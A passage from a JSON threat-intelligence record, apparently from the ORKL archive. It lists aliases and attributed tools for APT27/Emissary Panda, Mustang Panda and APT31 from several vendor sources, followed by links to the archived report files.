				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "74d9dada-0106-414a-8bb9-b0d527db7756",
			"created_at": "2025-08-07T02:03:24.69718Z",
			"updated_at": "2026-04-10T02:00:03.733346Z",
			"deleted_at": null,
			"main_name": "BRONZE VINEWOOD",
			"aliases": [
				"APT31 ",
				"BRONZE EXPRESS ",
				"Judgment Panda ",
				"Red Keres",
				"TA412",
				"VINEWOOD ",
				"Violet Typhoon ",
				"ZIRCONIUM "
			],
			"source_name": "Secureworks:BRONZE VINEWOOD",
			"tools": [
				"DropboxAES RAT",
				"HanaLoader",
				"Metasploit",
				"Mimikatz",
				"Reverse ICMP shell",
				"Trochilus"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434424,
	"ts_updated_at": 1775826749,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.pdf",
		"text": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.txt",
		"img": "https://archive.orkl.eu/9139a34107ab4cc3e506b55f7d2f2557f68b7e3e.jpg"
	}
}